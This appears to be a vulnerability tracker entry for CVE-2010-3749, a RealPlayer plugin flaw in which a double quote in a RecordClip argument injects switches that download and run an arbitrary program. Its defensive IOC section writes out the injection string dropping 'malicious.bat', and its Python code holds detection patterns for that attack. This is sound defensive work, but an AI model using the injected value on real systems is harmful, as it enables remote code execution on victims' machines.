CVE-2010-3749
Published 2010-10-19
Priority: P2 (65) · Severity: critical · CVSS 2.0 base score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit: public exploit indexed (see references)
EPSS: 26.09% (97.7th percentile)
The browser-plugin implementation in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1 allows remote attackers to inject arguments into the RecordClip method, which allows remote attackers to download an arbitrary program onto a client machine and execute this program, via a " (double quote) in an argument to the RecordClip method, aka "parameter injection."
Affected
16 ranges listed; the per-range version bounds were not captured, so identical rows are collapsed below. The description gives the affected versions: RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realnetworks | realplayer | — | — |
| realnetworks | realplayer_sp | — | — |
Detection & IOCs (extracted from sources)
- Command: `RecordClip(file, "audio/mpeg3", "clipInfo")` with injected `" /f C:\\malicious.bat /t cool_song.mp3`
- Monitor for RecordingManager.exe invocations containing the /f switch (arbitrary download path override) or /t switch (filename spoofing), especially when spawned by a browser process (iexplore.exe, firefox.exe), as these indicate exploitation of the RecordClip parameter injection vulnerability.
- Detect chimera files: files with a .mp3 extension that contain batch/script commands in the first few bytes. Inspect downloaded media files for non-MP3 magic bytes or embedded shell commands at file offset 0.
- Alert on double-quote characters injected into arguments passed to the RealPlayer RecordClip ActiveX method or Firefox plugin, as this is the injection delimiter used to append malicious /f and /t switches.
- The server-side payload must have a valid media file extension (e.g., .mp3). Network detection should flag .mp3 downloads from untrusted sources where the file content does not match expected MP3 structure (ID3 header or 0xFF 0xFB sync bytes).
- The exploit targets the RealPlayer 11.0–11.1 and RealPlayer SP 1.0–1.1 browser plugin (both ActiveX/IE and Firefox plugin variants). Confirm the installed RealPlayer version before applying detections, as later versions are not affected.
- The exploit works against both the Internet Explorer ActiveX control and the Firefox plugin implementations of the RealPlayer browser plugin, so detections should cover both browser contexts.
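As an added example (not code from this tracker, RealNetworks, or the exploit author), the two detections above in Python: a process-creation rule that flags RecordingManager.exe spawned by a browser with injected /f or /t switches, and a chimera check that rejects a .mp3 whose leading bytes are a batch script rather than an ID3 tag or MPEG frame sync. The events, paths, `example.invalid` URL and file bytes are constructed samples.

```python
import re

# Constructed sample process-creation events (not real telemetry); fields mirror
# what an EDR or Sysmon event 1 would carry: parent image, image, command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "image": r"C:\Program Files\Real\RealPlayer\RecordingManager.exe",
     "cmdline": r'"RecordingManager.exe" http://example.invalid/song.mp3 /f C:\malicious.bat /t cool_song.mp3'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Real\RealPlayer\RecordingManager.exe",
     "cmdline": r'"RecordingManager.exe" http://example.invalid/song.mp3'},
]
BROWSER_PARENTS = {"iexplore.exe", "firefox.exe"}
# A /f or /t switch preceded by whitespace, so "audio/mpeg3" or a URL path never matches.
SWITCH_RE = re.compile(r'(?:^|\s)/(?P<sw>[ft])\s+(?:"[^"]*"|\S+)', re.IGNORECASE)

def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def injected_switches(event: dict) -> list:
    """Switches (/f download-path override, /t filename spoof) found on a
    RecordingManager.exe command line spawned by a browser; [] means no alert."""
    if basename(event["image"]) != "recordingmanager.exe":
        return []
    if basename(event["parent"]) not in BROWSER_PARENTS:
        return []
    return sorted({m.group("sw").lower() for m in SWITCH_RE.finditer(event["cmdline"])})

def alerts(events: list) -> list:
    """Indexes of every event that carries injected switches."""
    return [i for i, e in enumerate(events) if injected_switches(e)]

def looks_like_mp3(data: bytes) -> bool:
    """ID3v2 tag, or an MPEG frame sync: 0xFF then a byte with its top three
    bits set (0xFF 0xFB is the common MPEG-1 Layer III case)."""
    if data[:3] == b"ID3":
        return True
    return len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0

BATCH_LINE_RE = re.compile(r"^\s*(@\s*)?(echo|rem|cmd|start|call|set|copy|del|powershell)\b", re.IGNORECASE)

def is_chimera(filename: str, data: bytes) -> bool:
    """A .mp3 whose first bytes are not MP3 audio but read like a batch script."""
    if not filename.lower().endswith(".mp3") or looks_like_mp3(data):
        return False
    first_line = data[:64].decode("latin-1").splitlines()[0] if data else ""
    return bool(BATCH_LINE_RE.match(first_line))

# Constructed file samples: a tagged MP3, a raw-frame MP3, and a batch chimera.
TAGGED_MP3 = b"ID3\x04\x00\x00\x00\x00\x00\x00" + b"\x00" * 8
RAW_MP3 = b"\xff\xfb\x90\x00" + b"\x00" * 8
CHIMERA = b"@echo off\r\necho not audio\r\n"
```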
No detection rules found.
No writeups or analysis indexed.
References
- http://service.real.com/realplayer/security/10152010_player/en/
- http://www.exploit-db.com/exploits/15991
- http://www.securityfocus.com/bid/44144
- http://www.securityfocus.com/bid/44443
- http://www.zerodayinitiative.com/advisories/ZDI-10-211/